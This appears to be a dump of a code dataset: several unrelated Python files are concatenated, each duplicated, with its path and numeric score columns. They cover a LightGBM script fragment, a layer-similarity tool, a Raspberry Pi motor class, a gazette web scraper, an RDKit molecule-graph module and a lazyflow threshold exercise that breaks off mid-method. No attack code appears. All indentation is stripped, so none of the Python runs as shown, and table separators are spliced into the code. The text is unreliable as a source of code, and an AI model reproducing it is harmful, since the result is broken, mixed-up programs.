, num_boost_round=50
#, valid_sets=lgb_eval
)
predictions = gbm.predict(x_train)
#print(predictions)
"""for i in predictions:
print(np.argmax(i))"""
#--------------------------------
for index, instance in dataset.iterrows():
actual = instance[target_name]
if is_regression == True:
prediction = round(predictions[index])
else: #classification
prediction = np.argmax(predictions[index])
print((index+1),". actual= ",actual,", prediction= ",prediction)
if plotTree == True:
ax = lgb.plot_tree(gbm)
plt.show()
#ax = lgb.plot_importance(gbm, max_num_features=10)
#plt.show() | 0.129871 | 0.222215 |
import numpy as np
import os
import argparse
from scipy.spatial.distance import pdist, squareform
def cos_sim(vector_a, vector_b):
"""
Cos Similarity
:param vector_a: vector a
:param vector_b: vector b
:return: sim
"""
return np.inner(vector_a, vector_b) / (np.linalg.norm(vector_a)*np.linalg.norm(vector_b))
def spearman(vi, vj):
def rank(ind):
l = ind.shape[0]
r = np.zeros(l)
for i in range(l):
r[ind[i]] = i
return r
assert vi.shape == vj.shape
ind_i = np.argsort(-vi)
ind_j = np.argsort(-vj)
rank_i = rank(ind_i)
rank_j = rank(ind_j)
s_corr = 1 - 6.0 * np.sum(np.square(rank_i - rank_j)) / (
vi.shape[0] * (vi.shape[0] ** 2 - 1))
return s_corr
def preprocess(matrix):
for i in range(matrix.shape[0]):
for j in range(matrix.shape[1]):
if i == j:
matrix[i, j] = 0
m = matrix.reshape(1, -1)
m_ = m[m != 0]
return m_.reshape(matrix.shape[0], matrix.shape[0]-1)
parser = argparse.ArgumentParser()
parser.add_argument('--dag-dir', dest='dag_dir', type=str)
parser.set_defaults(dag_dir='dag')
parser.add_argument('--source', dest='source', type=str)
parser.set_defaults(source='imagenet')
args = parser.parse_args()
if args.source == 'source':
list_of_layer = 'conv_0 conv_3 conv_7 conv_10 \
conv_14 conv_17 conv_20 conv_23 \
conv_27 conv_30 conv_33 conv_36 \
conv_40 conv_43 conv_46 \
conv_49 linear_1 linear_4 linear_6'.split()
elif args.source == 'imagenet':
list_of_layer = 'conv_0 conv_3 conv_7 conv_10 \
conv_14 conv_17 conv_20 conv_23 \
conv_27 conv_30 conv_33 conv_36 \
conv_40 conv_43 conv_46 \
conv_49 linear_0 linear_3 linear_6'.split()
else:
raise IOError('No such source')
target_layer = 'linear_target'
prj_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
dag_dir = os.path.join(prj_dir, args.dag_dir)
'''edge'''
target_feature = np.load(os.path.join(dag_dir, 'feature_{}'.format(args.source), 'feature_linear_{}.npy'.format(target_layer)))
target_feature = target_feature.reshape((target_feature.shape[0], -1))
target_edge = 1 - pdist(target_feature, 'cosine')
edge_list_vec = np.zeros((len(list_of_layer), 19900))
print('Edge:')
for i, layer in enumerate(list_of_layer):
f = np.load(os.path.join(dag_dir, 'feature_{}'.format(args.source), 'feature_{}.npy'.format(layer)))
f = f.reshape((f.shape[0], -1))
edge_list_vec[i] = 1 - pdist(f, 'cosine')
print(layer, ':', spearman(target_edge, edge_list_vec[i]))
'''node'''
target_attribution = np.load(os.path.join(dag_dir, 'node_{}'.format(args.source), 'node_linear_{}.npy'.format(target_layer)))
target_attribution = np.abs(target_attribution).mean(axis=1).reshape((target_attribution.shape[0], -1))
print('Node:')
for i, layer in enumerate(list_of_layer):
a = np.load(os.path.join(dag_dir, 'node_{}'.format(args.source), 'node_{}.npy'.format(layer)))
a = np.abs(a).mean(axis=1).reshape((a.shape[0], -1))
#a = a.mean(axis=1).reshape((a.shape[0], -1))
sim = 0
for k in range(a.shape[0]):
cos = np.inner(a[k], target_attribution[k]) / (np.linalg.norm(a[k]) * np.linalg.norm(target_attribution[k]))
sim += cos
print(layer, sim/200) | tools/layer_select.py | import numpy as np
import os
import argparse
from scipy.spatial.distance import pdist, squareform
def cos_sim(vector_a, vector_b):
"""
Cos Similarity
:param vector_a: vector a
:param vector_b: vector b
:return: sim
"""
return np.inner(vector_a, vector_b) / (np.linalg.norm(vector_a)*np.linalg.norm(vector_b))
def spearman(vi, vj):
def rank(ind):
l = ind.shape[0]
r = np.zeros(l)
for i in range(l):
r[ind[i]] = i
return r
assert vi.shape == vj.shape
ind_i = np.argsort(-vi)
ind_j = np.argsort(-vj)
rank_i = rank(ind_i)
rank_j = rank(ind_j)
s_corr = 1 - 6.0 * np.sum(np.square(rank_i - rank_j)) / (
vi.shape[0] * (vi.shape[0] ** 2 - 1))
return s_corr
def preprocess(matrix):
for i in range(matrix.shape[0]):
for j in range(matrix.shape[1]):
if i == j:
matrix[i, j] = 0
m = matrix.reshape(1, -1)
m_ = m[m != 0]
return m_.reshape(matrix.shape[0], matrix.shape[0]-1)
parser = argparse.ArgumentParser()
parser.add_argument('--dag-dir', dest='dag_dir', type=str)
parser.set_defaults(dag_dir='dag')
parser.add_argument('--source', dest='source', type=str)
parser.set_defaults(source='imagenet')
args = parser.parse_args()
if args.source == 'source':
list_of_layer = 'conv_0 conv_3 conv_7 conv_10 \
conv_14 conv_17 conv_20 conv_23 \
conv_27 conv_30 conv_33 conv_36 \
conv_40 conv_43 conv_46 \
conv_49 linear_1 linear_4 linear_6'.split()
elif args.source == 'imagenet':
list_of_layer = 'conv_0 conv_3 conv_7 conv_10 \
conv_14 conv_17 conv_20 conv_23 \
conv_27 conv_30 conv_33 conv_36 \
conv_40 conv_43 conv_46 \
conv_49 linear_0 linear_3 linear_6'.split()
else:
raise IOError('No such source')
target_layer = 'linear_target'
prj_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
dag_dir = os.path.join(prj_dir, args.dag_dir)
'''edge'''
target_feature = np.load(os.path.join(dag_dir, 'feature_{}'.format(args.source), 'feature_linear_{}.npy'.format(target_layer)))
target_feature = target_feature.reshape((target_feature.shape[0], -1))
target_edge = 1 - pdist(target_feature, 'cosine')
edge_list_vec = np.zeros((len(list_of_layer), 19900))
print('Edge:')
for i, layer in enumerate(list_of_layer):
f = np.load(os.path.join(dag_dir, 'feature_{}'.format(args.source), 'feature_{}.npy'.format(layer)))
f = f.reshape((f.shape[0], -1))
edge_list_vec[i] = 1 - pdist(f, 'cosine')
print(layer, ':', spearman(target_edge, edge_list_vec[i]))
'''node'''
target_attribution = np.load(os.path.join(dag_dir, 'node_{}'.format(args.source), 'node_linear_{}.npy'.format(target_layer)))
target_attribution = np.abs(target_attribution).mean(axis=1).reshape((target_attribution.shape[0], -1))
print('Node:')
for i, layer in enumerate(list_of_layer):
a = np.load(os.path.join(dag_dir, 'node_{}'.format(args.source), 'node_{}.npy'.format(layer)))
a = np.abs(a).mean(axis=1).reshape((a.shape[0], -1))
#a = a.mean(axis=1).reshape((a.shape[0], -1))
sim = 0
for k in range(a.shape[0]):
cos = np.inner(a[k], target_attribution[k]) / (np.linalg.norm(a[k]) * np.linalg.norm(target_attribution[k]))
sim += cos
print(layer, sim/200) | 0.486575 | 0.53437 |
try:
import RPi.GPIO as gpio
except ImportError:
import components.gpio as gpio
class Engine:
"""
Base class for all engines.
Provides basic functionality like forwards, backwards and stop.
"""
# Possible engine states
state = {
"FORWARD": (gpio.HIGH, gpio.LOW, gpio.HIGH),
"BACKWARD": (gpio.LOW, gpio.HIGH, gpio.HIGH),
"STOP": (gpio.LOW, gpio.LOW, gpio.LOW),
}
def __init__(self, pinConfiguration):
"""
Initalizes a new engine object with the given pin configuration.
The configuration should include two output and one pwm pin.
Keyword arguments:
pinConfiguraton (tuple) -- The pins on the pi board (pin1,pin2,pinpwm)
"""
pin1, pin2, pinPWM = pinConfiguration
# Pins
self.pin1 = pin1
self.pin2 = pin2
self.pinPWM = pinPWM
# Current powerlevel
self.power = 0
# setup pins as outputs
gpio.setup((self.pin1, self.pin2, self.pinPWM),
gpio.OUT)
# initialize pwm with 100%
self.pwm = gpio.PWM(self.pinPWM, 100)
def set_state(self, state, power):
"""
Sets output pins to the given state.
Keyword arguments:
state -- The engine state to set
power -- The pwm powerlevel to set
"""
self.power = power
if power != 0:
self.pwm.start(self.power)
gpio.output((self.pin1, self.pin2, self.pinPWM), state)
def forward(self, power):
"""
Engine going forwards with the given pwm power.
"""
self.set_state(Engine.state.get('FORWARD'), power)
def backward(self, power):
"""
Engine going backwards with the given pwm power.
"""
self.set_state(Engine.state.get('BACKWARD'), power)
def stop(self):
"""
Stops the engine and sets power to zero.
"""
self.set_state(Engine.state.get('STOP'), 0)
class Claw(Engine):
def open_with(self, power):
self.forward(power)
def close_with(self, power):
self.backward(power)
class Drive(Engine):
def forward_with(self, power):
self.forward(power)
def backward_with(self, power):
self.backward(power)
class Lift(Engine):
def upward_with(self, power):
self.forward(power)
def downward_with(self, power):
self.backward(power) | components/engine.py | try:
import RPi.GPIO as gpio
except ImportError:
import components.gpio as gpio
class Engine:
"""
Base class for all engines.
Provides basic functionality like forwards, backwards and stop.
"""
# Possible engine states
state = {
"FORWARD": (gpio.HIGH, gpio.LOW, gpio.HIGH),
"BACKWARD": (gpio.LOW, gpio.HIGH, gpio.HIGH),
"STOP": (gpio.LOW, gpio.LOW, gpio.LOW),
}
def __init__(self, pinConfiguration):
"""
Initalizes a new engine object with the given pin configuration.
The configuration should include two output and one pwm pin.
Keyword arguments:
pinConfiguraton (tuple) -- The pins on the pi board (pin1,pin2,pinpwm)
"""
pin1, pin2, pinPWM = pinConfiguration
# Pins
self.pin1 = pin1
self.pin2 = pin2
self.pinPWM = pinPWM
# Current powerlevel
self.power = 0
# setup pins as outputs
gpio.setup((self.pin1, self.pin2, self.pinPWM),
gpio.OUT)
# initialize pwm with 100%
self.pwm = gpio.PWM(self.pinPWM, 100)
def set_state(self, state, power):
"""
Sets output pins to the given state.
Keyword arguments:
state -- The engine state to set
power -- The pwm powerlevel to set
"""
self.power = power
if power != 0:
self.pwm.start(self.power)
gpio.output((self.pin1, self.pin2, self.pinPWM), state)
def forward(self, power):
"""
Engine going forwards with the given pwm power.
"""
self.set_state(Engine.state.get('FORWARD'), power)
def backward(self, power):
"""
Engine going backwards with the given pwm power.
"""
self.set_state(Engine.state.get('BACKWARD'), power)
def stop(self):
"""
Stops the engine and sets power to zero.
"""
self.set_state(Engine.state.get('STOP'), 0)
class Claw(Engine):
def open_with(self, power):
self.forward(power)
def close_with(self, power):
self.backward(power)
class Drive(Engine):
def forward_with(self, power):
self.forward(power)
def backward_with(self, power):
self.backward(power)
class Lift(Engine):
def upward_with(self, power):
self.forward(power)
def downward_with(self, power):
self.backward(power) | 0.698227 | 0.496277 |
import datetime
import re
import dateparser
import scrapy
from gazette.items import Gazette
from gazette.spiders.base import BaseGazetteSpider
class SpSaoGoncaloDoAmarante(BaseGazetteSpider):
"""
<NAME> has a primary url with
recent gazettes (https://saogoncalo.rn.gov.br/diario-oficial/)
and another with old gazettes (https://saogoncalo.rn.gov.br/jornal-oficial/).
The transition date of the urls occurred on 22/03/2017.
The gazettes available in the old url can be obtained by directly accessing the page of the year.
"""
TERRITORY_ID = "2412005"
name = "rn_sao_goncalo_do_amarante"
allowed_domains = ["saogoncalo.rn.gov.br"]
start_date = datetime.date(2013, 1, 2)
transition_date = datetime.date(2017, 3, 22)
NEW_URL = "https://saogoncalo.rn.gov.br/diario-oficial/"
OLD_URL = "https://saogoncalo.rn.gov.br/jom-{year}/"
PDF_URL = (
"https://saogoncalo.rn.gov.br/wp-content/uploads/{year}/{month}/{name}.pdf"
)
def start_requests(self):
"""
Yields a request for the new page and a request for each year from the start date to the transition date
"""
yield scrapy.Request(self.NEW_URL, callback=self.parse_page_after_transition)
if self.start_date < self.transition_date:
for year in list(
range(self.start_date.year, self.transition_date.year + 1)
):
yield scrapy.Request(
self.OLD_URL.format(year=year),
callback=self.parse_page_before_transition,
)
def parse_page_after_transition(self, response):
document_list = response.css(".post-attachment")
for document in document_list:
yield self.get_gazette(document=document, is_after_transition=True)
def parse_page_before_transition(self, response):
document_list = response.css(".inner a")
for document in document_list:
yield self.get_gazette(document=document, is_after_transition=False)
def get_file_url(self, title, date):
name = re.sub("[ -]+", "-", title)
month = str(date.month).zfill(2)
year = date.year
return self.PDF_URL.format(year=year, month=month, name=name)
def get_gazette(self, document, is_after_transition):
"""
Extract the information from the document and return a Gazette item
"""
title = document.css("::text").get()
edition_number = re.search(r"\d+", title).group(0)
is_extra_edition = bool(re.search(r"EXTRA", title, re.IGNORECASE))
date_text = re.search(
r"(\d{1,2}\w+\d{4})|(\d{1,2}.\d{1,2}.\d{4})", title
).group(0)
date = dateparser.parse(date_text, languages=["pt"]).date()
if is_after_transition:
file_url = self.get_file_url(title, date)
else:
file_url = document.css("::attr(href)").get()
return Gazette(
date=date,
edition_number=edition_number,
file_urls=[file_url],
power="executive_legislative",
is_extra_edition=is_extra_edition,
) | data_collection/gazette/spiders/rn_sao_goncalo_do_amarante.py | import datetime
import re
import dateparser
import scrapy
from gazette.items import Gazette
from gazette.spiders.base import BaseGazetteSpider
class SpSaoGoncaloDoAmarante(BaseGazetteSpider):
"""
<NAME> has a primary url with
recent gazettes (https://saogoncalo.rn.gov.br/diario-oficial/)
and another with old gazettes (https://saogoncalo.rn.gov.br/jornal-oficial/).
The transition date of the urls occurred on 22/03/2017.
The gazettes available in the old url can be obtained by directly accessing the page of the year.
"""
TERRITORY_ID = "2412005"
name = "rn_sao_goncalo_do_amarante"
allowed_domains = ["saogoncalo.rn.gov.br"]
start_date = datetime.date(2013, 1, 2)
transition_date = datetime.date(2017, 3, 22)
NEW_URL = "https://saogoncalo.rn.gov.br/diario-oficial/"
OLD_URL = "https://saogoncalo.rn.gov.br/jom-{year}/"
PDF_URL = (
"https://saogoncalo.rn.gov.br/wp-content/uploads/{year}/{month}/{name}.pdf"
)
def start_requests(self):
"""
Yields a request for the new page and a request for each year from the start date to the transition date
"""
yield scrapy.Request(self.NEW_URL, callback=self.parse_page_after_transition)
if self.start_date < self.transition_date:
for year in list(
range(self.start_date.year, self.transition_date.year + 1)
):
yield scrapy.Request(
self.OLD_URL.format(year=year),
callback=self.parse_page_before_transition,
)
def parse_page_after_transition(self, response):
document_list = response.css(".post-attachment")
for document in document_list:
yield self.get_gazette(document=document, is_after_transition=True)
def parse_page_before_transition(self, response):
document_list = response.css(".inner a")
for document in document_list:
yield self.get_gazette(document=document, is_after_transition=False)
def get_file_url(self, title, date):
name = re.sub("[ -]+", "-", title)
month = str(date.month).zfill(2)
year = date.year
return self.PDF_URL.format(year=year, month=month, name=name)
def get_gazette(self, document, is_after_transition):
"""
Extract the information from the document and return a Gazette item
"""
title = document.css("::text").get()
edition_number = re.search(r"\d+", title).group(0)
is_extra_edition = bool(re.search(r"EXTRA", title, re.IGNORECASE))
date_text = re.search(
r"(\d{1,2}\w+\d{4})|(\d{1,2}.\d{1,2}.\d{4})", title
).group(0)
date = dateparser.parse(date_text, languages=["pt"]).date()
if is_after_transition:
file_url = self.get_file_url(title, date)
else:
file_url = document.css("::attr(href)").get()
return Gazette(
date=date,
edition_number=edition_number,
file_urls=[file_url],
power="executive_legislative",
is_extra_edition=is_extra_edition,
) | 0.537527 | 0.328987 |
from collections import OrderedDict
import numpy as np
from .. import Chem, chemutils
from ..vocabulary import AtomTuple
try:
from ..genric_extensions import molecule_representation as mr_native
except ImportError:
from . import _implementation_python as mr_native
from ._implementation_python import atom_features, bond_features, ELEM_LIST, ATOM_FDIM, BOND_FDIM
MAX_NB = 6
def ring_info(mol):
ring_bond_idx = []
ring_bond_order = []
num_bonds = 0
for i, bond in enumerate(mol.GetBonds()):
if not bond.IsInRing():
continue
num_bonds += 1
bond_order = int(AtomTuple.from_atom(bond.GetBeginAtom()) < AtomTuple.from_atom(bond.GetEndAtom()))
ring_bond_idx.append(2 * i)
ring_bond_idx.append(2 * i + 1)
ring_bond_order.append(bond_order)
ring_bond_order.append(1 - bond_order)
return np.array(ring_bond_idx, dtype=np.int32), np.array(ring_bond_order, dtype=np.int32)
def _normalize_adjacency_values(values, normalization):
if normalization == 'sum':
return np.ones_like(values)
elif normalization == 'sqrt':
return values
elif normalization == 'mean':
return np.square(values, out=values)
else:
raise ValueError("Unknown normalization type {0}".format(normalization))
def atom_bond_list(mol, normalization='sum'):
""" Computes the atom-bond incidence list.
This method computes the atom-bond incidence list.
For each atom (row), the bonds it belongs to are enumerated, and recorded
in the ith column as an index.
Parameters
----------
mol: a rdkit molecule for which to compute the list.
normalization: 'sum', 'mean' or 'sqrt'. The normalization to apply.
Returns
-------
Elements with represent a sparse matrix in COO format.
"""
index = np.empty((2, 2 * mol.GetNumBonds()), dtype=np.int32)
values = np.empty(2 * mol.GetNumBonds(), dtype=np.float32)
mr_native.fill_atom_bond_list_sparse(values, index, mol)
values = _normalize_adjacency_values(values, normalization)
return index, values, (mol.GetNumAtoms(), 2 * mol.GetNumBonds())
def atom_bond_list_segment(mol):
""" Computes the atom-bond incidence list in segmented form.
This function returns the atom-bond list in segmented format.
Parameters
----------
mol: a rdkit molecule for which to compute the list.
"""
scopes = np.empty((mol.GetNumAtoms(), 2), dtype=np.int32)
index = np.empty(2 * mol.GetNumBonds(), dtype=np.int32)
mr_native.fill_atom_bond_list_segment(scopes, index, mol)
return scopes, index
def bond_incidence_list(mol, normalization='sum'):
""" Computes the bond-bond incidence list.
This method computes the bond-bond incidence list.
For each ordered bond (row), the (ordered) bonds with which it shares
an atom are enumerated, and are recorded in the ith column as a bond index.
When recording incident bonds, only incoming bonds are recorded (that is, the
orientation of the bond is such that the second atom is shared with the bond
being considered).
Parameters
----------
mol: a rdkit molecule for which to compute the list.
normalization: 'sum', 'mean' or 'sqrt'. The normalization to apply.
Returns
-------
a 2-d numpy array representing the given list. It has length 2 * num_bonds + 1.
"""
num_elements = mr_native.get_edge_incidence_size(mol)
index = np.empty((2, num_elements), dtype=np.int32)
values = np.empty(num_elements, dtype=np.float32)
mr_native.fill_bond_incidence_list_sparse(values, index, mol)
values = _normalize_adjacency_values(values, normalization)
return index, values, (2 * mol.GetNumBonds(), 2 * mol.GetNumBonds())
def bond_incidence_list_segment(mol):
""" Computes the bond-bond incidence list in segmented format. """
num_elements = mr_native.get_edge_incidence_size(mol)
scopes = np.empty((2 * mol.GetNumBonds(), 2), dtype=np.int32)
index = np.empty(num_elements, dtype=np.int32)
mr_native.fill_bond_incidence_list_segment(scopes, index, mol)
return scopes, index
def atom_leaves_index(mol):
return np.array(chemutils.get_atom_leaves(mol), dtype=np.int32)
def ring_leaves_index(mol):
""" Computes representation for ring leaves in molecules.
This function computes structures for ring leaf information. It is returned
as a tuple (and additional length information).
Each array of the tuple represents an atom in the molecule. The first array indicates
which leaf ring the atom belongs to, whereas the second array indicates the index
of the atom in the molecule.
"""
leaves = chemutils.get_ring_leaves(mol)
leaves = [np.array(x, dtype=np.int64) for x in leaves]
leaf_length = np.array([len(x) for x in leaves], dtype=np.int32)
idx_atom = np.concatenate([np.zeros([0], dtype=np.int64)] + leaves, axis=0)
idx_leaf = np.repeat(np.arange(len(leaves)), leaf_length)
idx = np.stack((idx_leaf, idx_atom))
values = np.repeat(np.reciprocal(np.sqrt(leaf_length.astype(np.float32)), where=leaf_length != 0), leaf_length)
shape = (len(leaves), mol.GetNumAtoms())
return (idx, values, shape), len(leaves)
def mol2graph_single(mol, include_leaves=False, include_rings=False, normalization='sum'):
""" Computes graph representation of given molecule.
Parameters
----------
mol: a `rdkit.Chem.Mol` representing the molecule for which to compute the representation
include_leaves: if True, also computes index informations for the leaves in the molecule.
include_rings: if True, also computes bond ring information for bonds belonging to rings.
normalization: the normalization to be used in aggregating bond messages.
Returns
-------
A ordered dictionary of 4 numpy tensors.
feature_atoms: a 2-d floating point array representing the feature embedding for each atom.
feature_bonds: a 2-d floating point array representing the features embedding for each bond.
atom_incidence: a 2-d integer array representing the incidence between each atom and bond.
bond_incidence: a 2-d integer array representing the incidence between bonds.
"""
num_atoms = mol.GetNumAtoms()
num_bonds = mol.GetNumBonds()
fatoms = np.zeros((num_atoms, ATOM_FDIM), dtype=np.float32)
fbonds = np.zeros((2 * num_bonds, ATOM_FDIM + BOND_FDIM), dtype=np.float32)
mr_native.fill_atom_features(fatoms, mol)
mr_native.fill_bond_features(fbonds, mol)
agraph = atom_bond_list(mol, normalization=normalization)
bgraph = bond_incidence_list(mol, normalization=normalization)
result = [
('atom_feature', fatoms),
('bond_feature', fbonds),
('atom_incidence', agraph),
('bond_incidence', bgraph)]
count = {
'atom': num_atoms,
'bond': num_bonds
}
if include_leaves:
ring_leaf_idx, num_ring_leaves = ring_leaves_index(mol)
result.append(('leaf_ring', ring_leaf_idx))
count['leaf_ring'] = num_ring_leaves
atom_leaf_idx = atom_leaves_index(mol)
result.append(('leaf_atom', atom_leaf_idx))
count['leaf_atom'] = len(atom_leaf_idx)
if include_rings:
ring_bond_idx, ring_bond_order = ring_info(mol)
result.append(('ring_bond_idx', ring_bond_idx))
result.append(('ring_bond_order', ring_bond_order))
count['ring'] = len(ring_bond_idx)
result.append(('count', count))
return OrderedDict(result) | code/genric/molecule_representation/_representation.py |
from collections import OrderedDict
import numpy as np
from .. import Chem, chemutils
from ..vocabulary import AtomTuple
try:
from ..genric_extensions import molecule_representation as mr_native
except ImportError:
from . import _implementation_python as mr_native
from ._implementation_python import atom_features, bond_features, ELEM_LIST, ATOM_FDIM, BOND_FDIM
MAX_NB = 6
def ring_info(mol):
ring_bond_idx = []
ring_bond_order = []
num_bonds = 0
for i, bond in enumerate(mol.GetBonds()):
if not bond.IsInRing():
continue
num_bonds += 1
bond_order = int(AtomTuple.from_atom(bond.GetBeginAtom()) < AtomTuple.from_atom(bond.GetEndAtom()))
ring_bond_idx.append(2 * i)
ring_bond_idx.append(2 * i + 1)
ring_bond_order.append(bond_order)
ring_bond_order.append(1 - bond_order)
return np.array(ring_bond_idx, dtype=np.int32), np.array(ring_bond_order, dtype=np.int32)
def _normalize_adjacency_values(values, normalization):
if normalization == 'sum':
return np.ones_like(values)
elif normalization == 'sqrt':
return values
elif normalization == 'mean':
return np.square(values, out=values)
else:
raise ValueError("Unknown normalization type {0}".format(normalization))
def atom_bond_list(mol, normalization='sum'):
""" Computes the atom-bond incidence list.
This method computes the atom-bond incidence list.
For each atom (row), the bonds it belongs to are enumerated, and recorded
in the ith column as an index.
Parameters
----------
mol: a rdkit molecule for which to compute the list.
normalization: 'sum', 'mean' or 'sqrt'. The normalization to apply.
Returns
-------
Elements with represent a sparse matrix in COO format.
"""
index = np.empty((2, 2 * mol.GetNumBonds()), dtype=np.int32)
values = np.empty(2 * mol.GetNumBonds(), dtype=np.float32)
mr_native.fill_atom_bond_list_sparse(values, index, mol)
values = _normalize_adjacency_values(values, normalization)
return index, values, (mol.GetNumAtoms(), 2 * mol.GetNumBonds())
def atom_bond_list_segment(mol):
""" Computes the atom-bond incidence list in segmented form.
This function returns the atom-bond list in segmented format.
Parameters
----------
mol: a rdkit molecule for which to compute the list.
"""
scopes = np.empty((mol.GetNumAtoms(), 2), dtype=np.int32)
index = np.empty(2 * mol.GetNumBonds(), dtype=np.int32)
mr_native.fill_atom_bond_list_segment(scopes, index, mol)
return scopes, index
def bond_incidence_list(mol, normalization='sum'):
""" Computes the bond-bond incidence list.
This method computes the bond-bond incidence list.
For each ordered bond (row), the (ordered) bonds with which it shares
an atom are enumerated, and are recorded in the ith column as a bond index.
When recording incident bonds, only incoming bonds are recorded (that is, the
orientation of the bond is such that the second atom is shared with the bond
being considered).
Parameters
----------
mol: a rdkit molecule for which to compute the list.
normalization: 'sum', 'mean' or 'sqrt'. The normalization to apply.
Returns
-------
a 2-d numpy array representing the given list. It has length 2 * num_bonds + 1.
"""
num_elements = mr_native.get_edge_incidence_size(mol)
index = np.empty((2, num_elements), dtype=np.int32)
values = np.empty(num_elements, dtype=np.float32)
mr_native.fill_bond_incidence_list_sparse(values, index, mol)
values = _normalize_adjacency_values(values, normalization)
return index, values, (2 * mol.GetNumBonds(), 2 * mol.GetNumBonds())
def bond_incidence_list_segment(mol):
""" Computes the bond-bond incidence list in segmented format. """
num_elements = mr_native.get_edge_incidence_size(mol)
scopes = np.empty((2 * mol.GetNumBonds(), 2), dtype=np.int32)
index = np.empty(num_elements, dtype=np.int32)
mr_native.fill_bond_incidence_list_segment(scopes, index, mol)
return scopes, index
def atom_leaves_index(mol):
return np.array(chemutils.get_atom_leaves(mol), dtype=np.int32)
def ring_leaves_index(mol):
""" Computes representation for ring leaves in molecules.
This function computes structures for ring leaf information. It is returned
as a tuple (and additional length information).
Each array of the tuple represents an atom in the molecule. The first array indicates
which leaf ring the atom belongs to, whereas the second array indicates the index
of the atom in the molecule.
"""
leaves = chemutils.get_ring_leaves(mol)
leaves = [np.array(x, dtype=np.int64) for x in leaves]
leaf_length = np.array([len(x) for x in leaves], dtype=np.int32)
idx_atom = np.concatenate([np.zeros([0], dtype=np.int64)] + leaves, axis=0)
idx_leaf = np.repeat(np.arange(len(leaves)), leaf_length)
idx = np.stack((idx_leaf, idx_atom))
values = np.repeat(np.reciprocal(np.sqrt(leaf_length.astype(np.float32)), where=leaf_length != 0), leaf_length)
shape = (len(leaves), mol.GetNumAtoms())
return (idx, values, shape), len(leaves)
def mol2graph_single(mol, include_leaves=False, include_rings=False, normalization='sum'):
""" Computes graph representation of given molecule.
Parameters
----------
mol: a `rdkit.Chem.Mol` representing the molecule for which to compute the representation
include_leaves: if True, also computes index informations for the leaves in the molecule.
include_rings: if True, also computes bond ring information for bonds belonging to rings.
normalization: the normalization to be used in aggregating bond messages.
Returns
-------
A ordered dictionary of 4 numpy tensors.
feature_atoms: a 2-d floating point array representing the feature embedding for each atom.
feature_bonds: a 2-d floating point array representing the features embedding for each bond.
atom_incidence: a 2-d integer array representing the incidence between each atom and bond.
bond_incidence: a 2-d integer array representing the incidence between bonds.
"""
num_atoms = mol.GetNumAtoms()
num_bonds = mol.GetNumBonds()
fatoms = np.zeros((num_atoms, ATOM_FDIM), dtype=np.float32)
fbonds = np.zeros((2 * num_bonds, ATOM_FDIM + BOND_FDIM), dtype=np.float32)
mr_native.fill_atom_features(fatoms, mol)
mr_native.fill_bond_features(fbonds, mol)
agraph = atom_bond_list(mol, normalization=normalization)
bgraph = bond_incidence_list(mol, normalization=normalization)
result = [
('atom_feature', fatoms),
('bond_feature', fbonds),
('atom_incidence', agraph),
('bond_incidence', bgraph)]
count = {
'atom': num_atoms,
'bond': num_bonds
}
if include_leaves:
ring_leaf_idx, num_ring_leaves = ring_leaves_index(mol)
result.append(('leaf_ring', ring_leaf_idx))
count['leaf_ring'] = num_ring_leaves
atom_leaf_idx = atom_leaves_index(mol)
result.append(('leaf_atom', atom_leaf_idx))
count['leaf_atom'] = len(atom_leaf_idx)
if include_rings:
ring_bond_idx, ring_bond_order = ring_info(mol)
result.append(('ring_bond_idx', ring_bond_idx))
result.append(('ring_bond_order', ring_bond_order))
count['ring'] = len(ring_bond_idx)
result.append(('count', count))
return OrderedDict(result) | 0.874493 | 0.582254 |
from lazyflow.operators import OpArrayPiper
"""
Operator classes usually start with "Op". We want to get started
quickly, so we just inherit from OpArrayPiper because the operator is
(at least to some extent) similar.
"""
class OpThreshold(OpArrayPiper):
    """Binarize the input against a fixed threshold.

    Output pixels are 1 where the input is >= ``_threshold`` and 0
    elsewhere.  Inherits slot setup (Input/Output) from OpArrayPiper.

    BUGFIX: the exercise placeholder left ``result`` unfilled, so the
    module-level assertions below always failed; ``execute`` now writes
    the thresholded data in place.
    """
    # It is always good to give operators a name.
    name = "OpThreshold_First_Try"
    # Hard-coded for now; replaced by a proper slot in a later version.
    _threshold = 0.5

    def execute(self, slot, subindex, roi, result):
        """Fill ``result`` with thresholded upstream data for ``roi``.

        Called whenever an OutputSlot of this operator is queried (unless
        that slot is connected to another slot).

        Parameters:
            slot      OutputSlot the data was requested from; only
                      self.Output exists here, so it is ignored.
            subindex  used for higher-level slots; ignored here.
            roi       requested region (lazyflow.rtype.SubRegion); passed
                      straight to Slot.get() to request upstream data.
            result    preallocated numpy array shaped like ``roi``; filled
                      in place — nothing is (or should be) returned.
        """
        threshold = self._threshold
        # Slot.get(roi) builds a request for exactly the requested region,
        # avoiding manual slicing extraction from the roi object.
        upstream_data = self.Input.get(roi).wait()
        assert upstream_data.shape == result.shape
        # Fill result in place (result[:] = ..., never rebind result);
        # numpy casts the boolean mask to result's dtype, yielding 0/1.
        result[:] = upstream_data >= threshold
"""
Ok, ready to test your implementation?
"""
import numpy
from lazyflow.graph import Graph
input_array = numpy.asarray([[.20, .60, .30],
[.10, .55, .99]])
expected_output_array = numpy.asarray([[0.0, 1.0, 0.0],
[0.0, 1.0, 1.0]])
op = OpThreshold(graph=Graph())
op.Input.setValue(input_array)
"""
Test whether requesting the whole array works ...
"""
output_array = op.Output[...].wait()
numpy.testing.assert_array_equal(output_array, expected_output_array)
"""
Test whether requesting a slice works ... Why do we need the squeeze()?
Hint: see last exercise.
"""
output_slice = op.Output[0, :].wait().squeeze()
expected_output_slice = expected_output_array[0, :]
numpy.testing.assert_array_equal(output_slice, expected_output_slice)
"""
That was not too hard. However, we used a fair amount of existent code,
which limits us in some ways.
"""
assert output_array.dtype == input_array.dtype
"""
Wouldn't it be nice if the output was a bool array rather than float64?
We will accomplish that in the next exercise.
""" | exercises/03/my_first_operator.py | from lazyflow.operators import OpArrayPiper
"""
Operator classes usually start with "Op". We want to get started
quickly, so we just inherit from OpArrayPiper because the operator is
(at least to some extent) similar.
"""
class OpThreshold(OpArrayPiper):
    """Binarize the input against a fixed threshold.

    Output pixels are 1 where the input is >= ``_threshold`` and 0
    elsewhere.  Inherits slot setup (Input/Output) from OpArrayPiper.

    BUGFIX: the exercise placeholder left ``result`` unfilled, so the
    module-level assertions below always failed; ``execute`` now writes
    the thresholded data in place.
    """
    # It is always good to give operators a name.
    name = "OpThreshold_First_Try"
    # Hard-coded for now; replaced by a proper slot in a later version.
    _threshold = 0.5

    def execute(self, slot, subindex, roi, result):
